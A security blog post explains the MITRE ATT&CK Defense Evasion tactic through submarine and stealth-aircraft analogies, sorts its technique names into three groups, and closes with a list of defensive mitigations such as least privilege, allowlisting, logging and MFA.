This, friends, is the Big Kahuna of tactics we’re talking about now! When I started writing this series of posts to discuss tactics, I feared the 7th tactic from the left. Why? Because we’re talking about the diverse and expansive ATT&CK Tactic of Defense Evasion. This brute contains a whopping 43 techniques and 155 sub-techniques. It is almost as if our adversaries really want to avoid detection or prevention and need options! Well, as this is so massive, we’re going to take a more holistic approach to this entry.

The importance of Defense Evasion

Defense evasion in any context is a group of techniques that allow one to hide, mask, or escape detection, capture, or confrontation. It can also include deception techniques. Both traditional warfare and cyberspace have their equivalents, but the goals are the same: live to fight another day. In cyberspace, these techniques are almost always associated with the attacker alone, but in traditional warfare all sides may need to enlist these TTPs to prevent becoming a casualty.

Run silent, run deep

If you haven’t seen the classic movie “Run Silent, Run Deep” you are missing out! Clarke Gable and Burt Lancaster were solid, but the secret weapon was Don Rickles ;). While the era was different than the one I served in, the TTPs were pretty similar. When I was stationed on submarines, we always wanted options evade. Our best course of action was to avoid detection in the first place. For a submariner, evading detection came down to being quiet and hiding “under the noise floor”, outside of the range and threshold of sonar arrays and buoys. We used a lot of different methods to stay quiet:

  • Propellers were specially designed to avoid making noises that might give the boat away.
  • Our hulls designed for minimal turbulence.
  • We had special mounts for everything
  • Some submarines used special tiles
  • Submariners wear sneakers underway, and take precautions to avoid slamming doors or dropping tools.
  • We used the quietest propulsion around (for us, nuclear, although new non-nuke boats have made huge leaps here!)
“Hey guys, did anyone figure out how to turn on Windows Event Logging? I could just ask the adversary to turn it on while they are in there…”

Now if we failed at that and were detected, our only options were to either hide better quickly or run like hell. And if they launched a torpedo, we had two options. We could launch a noisemaker and/or go all-ahead flank cavitate, making turns and depth changes in an effort to outrun our doom. Needless to say, we didn’t like the words “torpedo evasion” a whole lot.

While I was a member of the “senior stealth service” I believe combatant aircraft have similar approaches. A lot of effort and resources go into reducing the detectability of a particular aircraft. Radar cross-section is a huge focus, but minimizing heat signatures, reducing emissions, and allowing these aircraft to operate either above or below defenses is critical. Once detected, these aircraft have the ability to maneuver and attempt to outrun their opponents. They also have jamming capabilities, flares, and chaff to distract or blind the sensors.

Threat Actors have their own flares, decoys, and chaff

Threat actors need to evade detection to ensure their attacks survive beyond initial access. The impact of an attack or breach is realized when the adversary has time to access the critical data, services, or devices and impact operations. Some of the techniques hide the activity altogether, others mask or disguise the activity. Obviously the gold standard is to lay low. But sometimes visibility is too pervasive to overcome. Threat actors pretend to be legitimate users and pose their payloads, scripts, or other tools as benign. Sort of like locking onto a star destroyer and pretending to be trash prior to their jump to hyperspace.

APT28, like many venerable state-sponsored APTs spends a lot of time on Defense Evasion. It must be worthwhile! (from https://ma-insights.vercel.app/adversaries)

At the extreme, these same adversaries launch their attacks knowing full well that they will be seen. A subset of the TTPs in Defense Evasion allow them to completely neutralize the protective action. In a harrowing scene The Hunt for Red October, the Red October turns into the torpedoes launched by the Soviet submarine, the Konovalov. Knowing that the Konovalov had safeties set to prevent the torpedo from acquiring their own ship, the torpedo breaks up on impact. Cyber adversaries exploit the configuration of tools, startup scripts, or registries, or even turn those tools against other processes in similar fashion, exploiting the use of exclusions, which act as a form of safety. Increasingly we see threat actors disable the detection and prevention tools altogether.

Defense Evasion: throwing the defenders of the scent

The 43 techniques and 155 sub-techniques in Defense Evasion (TA0005) are focused on three main areas: impacting security tools, obfuscating actions, and hijacking or piggybacking on legitimate processes. I took a crack at sorting them into those three categories here.

Impacting Security ToolsObfuscating ActionsHijacking or Piggybacking on Legitimate Processes
Disabling Security Tools (T1562)Binary Padding (T1027.001)Process Hollowing (T1055.012)
Impair Defenses (T1562.001)Software Packing (T1027.002)Process Doppelgänging (T1055.013)
Deactivate Cloud Logs (T1562.008)Obfuscated Files or Information (T1027)Trusted Developer Utilities Proxy Execution (T1127)
Indicator Blocking (T1054)Rootkit (T1014)Hijack Execution Flow (T1574)
Rootkit (T1014)DLL Side-Loading (T1574.002)
Modify Registry (T1112)Prepend Data (T1027.006)Dylib Hijacking (T1574.004)
Process Injection (T1055)Encryption/Obfuscation (T1027.005)Executable Installer File Permissions Weakness (T1574.005)
Subvert Trust Controls (T1553)Modify Cloud Compute Infrastructure (T1578.006)Path Interception (T1574.010)
Masquerading (T1036)Process Injection (T1055)
Signed Binary Proxy Execution (T1218)
System Binary Proxy Execution (T1218.011)
Template Injection (T1221)
ATT&CK TTPs for Defense Evasion run the gamut, but ChatGPT and I settled on this sorting. We duked it out, but you get the idea 😉

This categorization is somewhat subjective and the techniques can overlap categories depending on their specific use case. In any case, look for these to be blended with other Tactics, as they go hand in hand. You don’t just rob a bank and disguise yoursellf separately, you disguise yourself while robbing a bank. So I am told. Below is an example of Carbanak using UAC bypass to evade detection and execute mimikatz.

Think of Defense Evasion as a super important add-on to almost any step an adversary takes inside a target environment. Carbanak uses UAC in multiple steps to ensure the action is taken.

How do defenders avoid being duped?

The sheer number of techniques and procedures in the Defense Evasion tactic make a short discussion of detection (a.k.a. Data Sources) and mitigations impossible. But it doesn’t mean we cannot try! Here are some of the top recurring mitigation themes in ATT&CK for these TTPs:

  1. Privileged Account Management: Least Privilege is super helpful here, folks!
  2. Execution Prevention: Allowlisting or ExPrev engines a must – any EDR/EPP needs to have those enabled.
  3. Software Restriction Policies: code-signing, approved packages, file integrity, and user/executable policy mapping prevents a wide variety of the obfuscation and hijacking TTPs.
  4. User Account Control: UAC gets a bad rap, but the frustration is a small hassle compared to the reduced risk.
  5. Log and Audit: Collect and monitor logs, folks! The OS is talking – are you listening?
  6. Behavior Prevention on Endpoint: Much like ExPrev above, but with more fuzzy math to anticipate new things.
  7. Restrict File and Directory Permissions: It gets much harder on bad guys when we keep them hemmed into tight spots.
  8. Multi-factor Authentication: Most of the TTPs in this realm can be interrupted or curtailed with MFA in the mix. Balance is key, but it is worth some friction in the experience to ensure only legitimate users are involved.
  9. Update Software: Keep all software up to date, including operating systems and applications, to mitigate the exploitation of known vulnerabilities.

It is worth looking, once you build a threat picture, at the resultant recommendations from your tailored analysis. Most folks will find the above gives them a really good start!

Conclusion

Defense Evasion is dirty pool, as my old bartending colleagues used to call it. It doesn’t just rely on gaming the system, but on breaking it. During postmortems, defense evasion is often the tactic that causes the most embarrassment. When military units pull it off, historians write about the sheer skill of the adversary and the gullible nature of the duped, but the truth is that there are a lot of factors in play. Defense Evasion, much like Persistence and Execution, happens together with other things. It is the smokescreen under which the adversary moves through the system, disrupts a service, or exfiltrates critical data.

While evasion occurs on both the defensive and offensive side of a traditional engagement, cyberspace sees the adversary more often using these techniques. In either case, mitigation of that risk depends on vigilant use of multiple detection methods. Bringing multiple sensors to bear on the same vector makes it much harder for an adversary to hide, evade or dupe us. The parallels are uncanny – submarines fear one adversary, but having an entire carrier battle group chase you down is downright mortifying. The spread and complimentary diversity of sensors make it so much harder to hide.

Hopefully this post has been helpful, and I look forward to any feedback or conversation this might spark!